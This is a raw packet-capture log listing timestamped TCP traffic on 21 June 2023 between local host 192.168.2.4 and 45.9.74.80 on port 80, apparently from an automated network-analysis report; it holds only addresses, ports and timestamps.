                                                                                                  Jun 21, 2023 20:24:11.114976883 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.114994049 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.115037918 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.115098000 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.115102053 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.115156889 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.115216017 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.115226030 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.115276098 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.115334988 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.115338087 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.115408897 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.115416050 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.115475893 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.115535975 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.115535975 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.115593910 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.115602970 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.115652084 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.115710974 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.115712881 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.115768909 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.115828037 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.115833998 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.115885973 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.115892887 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.115943909 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116003036 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116012096 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.116064072 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116122961 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116132975 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.116179943 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116183043 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.116239071 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116306067 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.116323948 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116384983 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116442919 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116451025 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.116502047 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116503954 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.116563082 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116672039 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116673946 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.116738081 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116799116 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116805077 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.116858959 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116897106 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.116916895 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116977930 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.116986036 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.117036104 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.117094994 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.117106915 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.117156982 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.117163897 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.117218971 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.117284060 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.117302895 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.117355108 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.117413998 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.117420912 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.117475033 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.117477894 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.117537975 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.117597103 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.117607117 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.117655039 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.117712975 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.117717981 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.117772102 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.117777109 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.117830992 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.117888927 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.117893934 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.117949009 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118020058 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118076086 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118130922 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118194103 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.118195057 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.118206024 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118271112 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118330956 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118340969 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.118392944 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118452072 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118460894 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.118515968 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.118516922 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118581057 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118643045 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.118644953 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118710995 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118774891 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.118799925 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118861914 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118869066 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.118921041 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118978977 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.118983984 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.119038105 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119096041 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119106054 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.119159937 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.119160891 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119220972 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119280100 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119288921 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.119338036 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119395971 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119402885 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.119455099 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119457006 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.119513035 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119543076 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.119570017 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.119580984 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119642973 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.119643927 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119712114 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.119714022 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119779110 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.119781017 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119839907 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.119844913 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119899988 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.119903088 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119962931 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.119970083 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.120019913 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.120023012 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.120079041 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.120079994 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.120140076 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.120146036 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.120198965 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.120201111 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.120258093 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.120259047 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.120342970 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.120465040 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.120523930 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.120537996 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.120584965 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.120593071 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.120644093 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.120645046 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.120702982 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.120708942 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.120760918 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.120760918 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.120817900 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.120819092 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.120878935 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.120882988 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.120949030 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.120965004 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.121006966 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.121079922 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.121145010 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.121150970 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.121206045 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.121206045 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.121267080 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.121273041 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.121326923 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.121328115 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.121385098 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.121391058 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.121449947 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.121449947 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.121516943 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.121516943 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.121577024 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.121582031 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.121651888 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.121711969 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.121718884 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.121771097 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.121829033 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.121834040 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.121886969 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.121890068 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.121951103 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.122009993 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.122010946 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.122076988 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.122139931 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.122139931 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.122204065 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.122209072 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.122273922 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.122340918 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.122342110 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.122409105 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.122473001 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.122477055 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.122541904 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.122544050 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.122605085 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.122667074 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.122673035 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.122736931 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.122800112 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.122802019 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.122863054 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.122953892 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123018026 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123081923 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.123085022 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123152018 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123212099 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123234987 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.123265982 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.123270988 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123290062 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.123330116 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123399973 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.123416901 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123534918 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123541117 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.123601913 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123671055 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123678923 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.123742104 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123805046 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123810053 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.123862982 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123862982 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.123924017 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123981953 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.123985052 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.124041080 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124103069 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124109030 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.124161005 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124164104 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.124218941 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124291897 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.124299049 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124363899 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124422073 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124429941 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.124480963 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.124481916 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124541044 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124598980 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124603987 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.124656916 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124716043 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124716997 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.124774933 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124775887 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.124860048 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124903917 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124917984 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.124948978 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.124993086 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125025034 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125056028 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125088930 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125134945 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125149965 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125149965 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125180006 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125222921 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125236988 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125267982 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125313997 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125328064 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125360012 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125369072 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125402927 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125448942 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125459909 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125494003 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125544071 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125550985 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125590086 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125600100 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125646114 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125667095 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125686884 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125708103 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125715017 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125715017 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125729084 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125737906 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125751019 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125772953 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125772953 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125772953 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125793934 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125798941 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125814915 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125818014 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125834942 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125844002 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125855923 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125868082 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125878096 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125891924 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125899076 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125909090 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125920057 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125925064 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125937939 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125941992 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125962973 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.125982046 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125982046 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.125983953 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.126000881 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.126004934 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.126027107 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.126034021 CEST4971980192.168.2.445.9.74.80
